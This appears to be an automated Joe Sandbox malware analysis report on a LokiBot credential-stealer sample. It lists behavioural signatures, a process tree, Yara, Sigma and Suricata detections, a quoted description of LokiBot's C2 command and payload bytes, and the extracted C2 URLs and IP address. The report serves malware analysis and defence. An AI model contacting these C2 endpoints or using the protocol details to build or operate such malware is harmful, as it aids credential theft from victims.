Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9876567899.bat.exe

Overview

General Information

Sample name:9876567899.bat.exe
Analysis ID:1585229
MD5:6d9798801523ee1c8c5dc83d28346814
SHA1:66d6c6e65ffb8c635a286d68de624ef5d469cf9b
SHA256:62e0fac7c5231aa0d8d5f0fdb9e64d8bdadf79934a26577282b7affbc557a5fb
Tags:exeLokiuser-abuse_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 9876567899.bat.exe (PID: 408 cmdline: "C:\Users\user\Desktop\9876567899.bat.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
    • palladiums.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\9876567899.bat.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
      • svchost.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\9876567899.bat.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • Dhy2kmz.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Roaming\Dhy2kmz.exe" MD5: CDD3D1BB178C391A905C40D2B292F4D6)
          • Dhy2kmz.exe (PID: 7064 cmdline: "C:\Users\user\AppData\Roaming\Dhy2kmz.exe" MD5: CDD3D1BB178C391A905C40D2B292F4D6)
            • WerFault.exe (PID: 7248 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 996 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 1292 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • palladiums.exe (PID: 7220 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
      • palladiums.exe (PID: 7276 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
        • palladiums.exe (PID: 7304 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
          • palladiums.exe (PID: 7364 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
            • palladiums.exe (PID: 7432 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
              • palladiums.exe (PID: 7500 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                • palladiums.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                  • palladiums.exe (PID: 7576 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                    • palladiums.exe (PID: 7600 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                      • palladiums.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                        • palladiums.exe (PID: 7672 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                          • palladiums.exe (PID: 7696 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                            • palladiums.exe (PID: 7716 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                              • palladiums.exe (PID: 7736 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                • palladiums.exe (PID: 7760 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                  • palladiums.exe (PID: 7780 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                    • palladiums.exe (PID: 7800 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                      • palladiums.exe (PID: 7820 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                        • palladiums.exe (PID: 7856 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                          • palladiums.exe (PID: 7884 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                            • palladiums.exe (PID: 7904 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                              • palladiums.exe (PID: 7936 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                                • palladiums.exe (PID: 7960 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                                  • palladiums.exe (PID: 7980 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                                    • palladiums.exe (PID: 8000 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                                      • palladiums.exe (PID: 8028 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                                        • palladiums.exe (PID: 8048 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                                          • palladiums.exe (PID: 8076 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
                                                            • palladiums.exe (PID: 8096 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://172.245.123.11/tpm/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 286 entries
          SourceRuleDescriptionAuthorStrings
          14.2.palladiums.exe.ad0000.1.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
            14.2.palladiums.exe.ad0000.1.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              14.2.palladiums.exe.ad0000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                14.2.palladiums.exe.ad0000.1.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                14.2.palladiums.exe.ad0000.1.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                Click to see the 366 entries

                System Summary

                barindex
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , ProcessId: 1292, ProcessName: wscript.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\9876567899.bat.exe", CommandLine: "C:\Users\user\Desktop\9876567899.bat.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\9876567899.bat.exe", ParentImage: C:\Users\user\AppData\Local\preinhered\palladiums.exe, ParentProcessId: 7092, ParentProcessName: palladiums.exe, ProcessCommandLine: "C:\Users\user\Desktop\9876567899.bat.exe", ProcessId: 6784, ProcessName: svchost.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , ProcessId: 1292, ProcessName: wscript.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\9876567899.bat.exe", CommandLine: "C:\Users\user\Desktop\9876567899.bat.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\9876567899.bat.exe", ParentImage: C:\Users\user\AppData\Local\preinhered\palladiums.exe, ParentProcessId: 7092, ParentProcessName: palladiums.exe, ProcessCommandLine: "C:\Users\user\Desktop\9876567899.bat.exe", ProcessId: 6784, ProcessName: svchost.exe

                Data Obfuscation

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\preinhered\palladiums.exe, ProcessId: 7092, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T11:02:00.833300+010020220531A Network Trojan was detected194.15.112.248443192.168.2.549707TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T11:01:57.233864+010020243121A Network Trojan was detected192.168.2.549704172.245.123.1180TCP
                2025-01-07T11:01:57.878406+010020243121A Network Trojan was detected192.168.2.549705172.245.123.1180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T11:01:56.715463+010020253811Malware Command and Control Activity Detected192.168.2.549704172.245.123.1180TCP
                2025-01-07T11:01:57.382609+010020253811Malware Command and Control Activity Detected192.168.2.549705172.245.123.1180TCP
                2025-01-07T11:01:57.943923+010020253811Malware Command and Control Activity Detected192.168.2.549706172.245.123.1180TCP
                2025-01-07T11:01:58.646333+010020253811Malware Command and Control Activity Detected192.168.2.549708172.245.123.1180TCP
                2025-01-07T11:01:59.326148+010020253811Malware Command and Control Activity Detected192.168.2.549709172.245.123.1180TCP
                2025-01-07T11:01:59.975652+010020253811Malware Command and Control Activity Detected192.168.2.549710172.245.123.1180TCP
                2025-01-07T11:02:00.675299+010020253811Malware Command and Control Activity Detected192.168.2.549711172.245.123.1180TCP
                2025-01-07T11:02:01.372775+010020253811Malware Command and Control Activity Detected192.168.2.549712172.245.123.1180TCP
                2025-01-07T11:02:02.102743+010020253811Malware Command and Control Activity Detected192.168.2.549714172.245.123.1180TCP
                2025-01-07T11:02:02.801547+010020253811Malware Command and Control Activity Detected192.168.2.549715172.245.123.1180TCP
                2025-01-07T11:02:03.617744+010020253811Malware Command and Control Activity Detected192.168.2.549716172.245.123.1180TCP
                2025-01-07T11:02:04.247901+010020253811Malware Command and Control Activity Detected192.168.2.549717172.245.123.1180TCP
                2025-01-07T11:02:04.955089+010020253811Malware Command and Control Activity Detected192.168.2.549718172.245.123.1180TCP
                2025-01-07T11:02:05.693265+010020253811Malware Command and Control Activity Detected192.168.2.549719172.245.123.1180TCP
                2025-01-07T11:02:06.454475+010020253811Malware Command and Control Activity Detected192.168.2.549720172.245.123.1180TCP
                2025-01-07T11:02:07.167908+010020253811Malware Command and Control Activity Detected192.168.2.549721172.245.123.1180TCP
                2025-01-07T11:02:07.855998+010020253811Malware Command and Control Activity Detected192.168.2.549722172.245.123.1180TCP
                2025-01-07T11:02:08.543768+010020253811Malware Command and Control Activity Detected192.168.2.549723172.245.123.1180TCP
                2025-01-07T11:02:09.203966+010020253811Malware Command and Control Activity Detected192.168.2.549724172.245.123.1180TCP
                2025-01-07T11:02:09.860003+010020253811Malware Command and Control Activity Detected192.168.2.549725172.245.123.1180TCP
                2025-01-07T11:02:10.546688+010020253811Malware Command and Control Activity Detected192.168.2.549727172.245.123.1180TCP
                2025-01-07T11:02:11.233719+010020253811Malware Command and Control Activity Detected192.168.2.549730172.245.123.1180TCP
                2025-01-07T11:02:11.958150+010020253811Malware Command and Control Activity Detected192.168.2.549732172.245.123.1180TCP
                2025-01-07T11:02:12.617821+010020253811Malware Command and Control Activity Detected192.168.2.549734172.245.123.1180TCP
                2025-01-07T11:02:13.258855+010020253811Malware Command and Control Activity Detected192.168.2.549736172.245.123.1180TCP
                2025-01-07T11:02:13.915720+010020253811Malware Command and Control Activity Detected192.168.2.549738172.245.123.1180TCP
                2025-01-07T11:02:14.575614+010020253811Malware Command and Control Activity Detected192.168.2.549739172.245.123.1180TCP
                2025-01-07T11:02:15.241631+010020253811Malware Command and Control Activity Detected192.168.2.549740172.245.123.1180TCP
                2025-01-07T11:02:15.898264+010020253811Malware Command and Control Activity Detected192.168.2.549741172.245.123.1180TCP
                2025-01-07T11:02:16.561248+010020253811Malware Command and Control Activity Detected192.168.2.549742172.245.123.1180TCP
                2025-01-07T11:02:17.278413+010020253811Malware Command and Control Activity Detected192.168.2.549748172.245.123.1180TCP
                2025-01-07T11:02:17.961173+010020253811Malware Command and Control Activity Detected192.168.2.549754172.245.123.1180TCP
                2025-01-07T11:02:18.640081+010020253811Malware Command and Control Activity Detected192.168.2.549760172.245.123.1180TCP
                2025-01-07T11:02:19.327075+010020253811Malware Command and Control Activity Detected192.168.2.549766172.245.123.1180TCP
                2025-01-07T11:02:20.043059+010020253811Malware Command and Control Activity Detected192.168.2.549772172.245.123.1180TCP
                2025-01-07T11:02:20.742103+010020253811Malware Command and Control Activity Detected192.168.2.549778172.245.123.1180TCP
                2025-01-07T11:02:21.431219+010020253811Malware Command and Control Activity Detected192.168.2.549784172.245.123.1180TCP
                2025-01-07T11:02:22.122622+010020253811Malware Command and Control Activity Detected192.168.2.549790172.245.123.1180TCP
                2025-01-07T11:02:22.801706+010020253811Malware Command and Control Activity Detected192.168.2.549795172.245.123.1180TCP
                2025-01-07T11:02:23.524470+010020253811Malware Command and Control Activity Detected192.168.2.549801172.245.123.1180TCP
                2025-01-07T11:02:24.248034+010020253811Malware Command and Control Activity Detected192.168.2.549804172.245.123.1180TCP
                2025-01-07T11:02:24.981285+010020253811Malware Command and Control Activity Detected192.168.2.549810172.245.123.1180TCP
                2025-01-07T11:02:25.670616+010020253811Malware Command and Control Activity Detected192.168.2.549815172.245.123.1180TCP
                2025-01-07T11:02:26.424356+010020253811Malware Command and Control Activity Detected192.168.2.549821172.245.123.1180TCP
                2025-01-07T11:02:27.144150+010020253811Malware Command and Control Activity Detected192.168.2.549828172.245.123.1180TCP
                2025-01-07T11:02:27.947960+010020253811Malware Command and Control Activity Detected192.168.2.549834172.245.123.1180TCP
                2025-01-07T11:02:28.637968+010020253811Malware Command and Control Activity Detected192.168.2.549839172.245.123.1180TCP
                2025-01-07T11:02:29.308443+010020253811Malware Command and Control Activity Detected192.168.2.549843172.245.123.1180TCP
                2025-01-07T11:02:30.085557+010020253811Malware Command and Control Activity Detected192.168.2.549849172.245.123.1180TCP
                2025-01-07T11:02:30.768828+010020253811Malware Command and Control Activity Detected192.168.2.549854172.245.123.1180TCP
                2025-01-07T11:02:31.465790+010020253811Malware Command and Control Activity Detected192.168.2.549860172.245.123.1180TCP
                2025-01-07T11:02:32.162958+010020253811Malware Command and Control Activity Detected192.168.2.549865172.245.123.1180TCP
                2025-01-07T11:02:33.125642+010020253811Malware Command and Control Activity Detected192.168.2.549872172.245.123.1180TCP
                2025-01-07T11:02:33.779104+010020253811Malware Command and Control Activity Detected192.168.2.549877172.245.123.1180TCP
                2025-01-07T11:02:34.503792+010020253811Malware Command and Control Activity Detected192.168.2.549883172.245.123.1180TCP
                2025-01-07T11:02:35.152174+010020253811Malware Command and Control Activity Detected192.168.2.549889172.245.123.1180TCP
                2025-01-07T11:02:35.829436+010020253811Malware Command and Control Activity Detected192.168.2.549895172.245.123.1180TCP
                2025-01-07T11:02:36.478731+010020253811Malware Command and Control Activity Detected192.168.2.549901172.245.123.1180TCP
                2025-01-07T11:02:37.135567+010020253811Malware Command and Control Activity Detected192.168.2.549907172.245.123.1180TCP
                2025-01-07T11:02:37.908206+010020253811Malware Command and Control Activity Detected192.168.2.549912172.245.123.1180TCP
                2025-01-07T11:02:38.589708+010020253811Malware Command and Control Activity Detected192.168.2.549915172.245.123.1180TCP
                2025-01-07T11:02:39.258110+010020253811Malware Command and Control Activity Detected192.168.2.549920172.245.123.1180TCP
                2025-01-07T11:02:39.972590+010020253811Malware Command and Control Activity Detected192.168.2.549926172.245.123.1180TCP
                2025-01-07T11:02:40.635703+010020253811Malware Command and Control Activity Detected192.168.2.549932172.245.123.1180TCP
                2025-01-07T11:02:41.303821+010020253811Malware Command and Control Activity Detected192.168.2.549934172.245.123.1180TCP
                2025-01-07T11:02:41.967237+010020253811Malware Command and Control Activity Detected192.168.2.549940172.245.123.1180TCP
                2025-01-07T11:02:42.625053+010020253811Malware Command and Control Activity Detected192.168.2.549946172.245.123.1180TCP
                2025-01-07T11:02:43.363394+010020253811Malware Command and Control Activity Detected192.168.2.549952172.245.123.1180TCP
                2025-01-07T11:02:44.019633+010020253811Malware Command and Control Activity Detected192.168.2.549958172.245.123.1180TCP
                2025-01-07T11:02:44.684154+010020253811Malware Command and Control Activity Detected192.168.2.549964172.245.123.1180TCP
                2025-01-07T11:02:45.507465+010020253811Malware Command and Control Activity Detected192.168.2.549969172.245.123.1180TCP
                2025-01-07T11:02:46.180115+010020253811Malware Command and Control Activity Detected192.168.2.549971172.245.123.1180TCP
                2025-01-07T11:02:46.851221+010020253811Malware Command and Control Activity Detected192.168.2.549976172.245.123.1180TCP
                2025-01-07T11:02:47.795111+010020253811Malware Command and Control Activity Detected192.168.2.549982172.245.123.1180TCP
                2025-01-07T11:02:48.451009+010020253811Malware Command and Control Activity Detected192.168.2.549987172.245.123.1180TCP
                2025-01-07T11:02:49.150118+010020253811Malware Command and Control Activity Detected192.168.2.549994172.245.123.1180TCP
                2025-01-07T11:02:49.806913+010020253811Malware Command and Control Activity Detected192.168.2.550000172.245.123.1180TCP
                2025-01-07T11:02:50.480746+010020253811Malware Command and Control Activity Detected192.168.2.550006172.245.123.1180TCP
                2025-01-07T11:02:51.210960+010020253811Malware Command and Control Activity Detected192.168.2.550009172.245.123.1180TCP
                2025-01-07T11:02:51.916359+010020253811Malware Command and Control Activity Detected192.168.2.550015172.245.123.1180TCP
                2025-01-07T11:02:52.618644+010020253811Malware Command and Control Activity Detected192.168.2.550020172.245.123.1180TCP
                2025-01-07T11:02:53.273172+010020253811Malware Command and Control Activity Detected192.168.2.550026172.245.123.1180TCP
                2025-01-07T11:02:53.936803+010020253811Malware Command and Control Activity Detected192.168.2.550032172.245.123.1180TCP
                2025-01-07T11:02:55.171759+010020253811Malware Command and Control Activity Detected192.168.2.550038172.245.123.1180TCP
                2025-01-07T11:02:55.829665+010020253811Malware Command and Control Activity Detected192.168.2.550044172.245.123.1180TCP
                2025-01-07T11:02:56.557892+010020253811Malware Command and Control Activity Detected192.168.2.550050172.245.123.1180TCP
                2025-01-07T11:02:57.234366+010020253811Malware Command and Control Activity Detected192.168.2.550055172.245.123.1180TCP
                2025-01-07T11:02:57.904891+010020253811Malware Command and Control Activity Detected192.168.2.550061172.245.123.1180TCP
                2025-01-07T11:02:58.574189+010020253811Malware Command and Control Activity Detected192.168.2.550066172.245.123.1180TCP
                2025-01-07T11:02:59.229112+010020253811Malware Command and Control Activity Detected192.168.2.550067172.245.123.1180TCP
                2025-01-07T11:02:59.900572+010020253811Malware Command and Control Activity Detected192.168.2.550068172.245.123.1180TCP
                2025-01-07T11:03:00.558517+010020253811Malware Command and Control Activity Detected192.168.2.550069172.245.123.1180TCP
                2025-01-07T11:03:01.212085+010020253811Malware Command and Control Activity Detected192.168.2.550070172.245.123.1180TCP
                2025-01-07T11:03:01.900649+010020253811Malware Command and Control Activity Detected192.168.2.550071172.245.123.1180TCP
                2025-01-07T11:03:02.675531+010020253811Malware Command and Control Activity Detected192.168.2.550072172.245.123.1180TCP
                2025-01-07T11:03:03.337291+010020253811Malware Command and Control Activity Detected192.168.2.550073172.245.123.1180TCP
                2025-01-07T11:03:04.013533+010020253811Malware Command and Control Activity Detected192.168.2.550074172.245.123.1180TCP
                2025-01-07T11:03:04.679878+010020253811Malware Command and Control Activity Detected192.168.2.550075172.245.123.1180TCP
                2025-01-07T11:03:05.319446+010020253811Malware Command and Control Activity Detected192.168.2.550076172.245.123.1180TCP
                2025-01-07T11:03:05.975970+010020253811Malware Command and Control Activity Detected192.168.2.550077172.245.123.1180TCP
                2025-01-07T11:03:06.639844+010020253811Malware Command and Control Activity Detected192.168.2.550078172.245.123.1180TCP
                2025-01-07T11:03:07.327650+010020253811Malware Command and Control Activity Detected192.168.2.550079172.245.123.1180TCP
                2025-01-07T11:03:08.132275+010020253811Malware Command and Control Activity Detected192.168.2.550080172.245.123.1180TCP
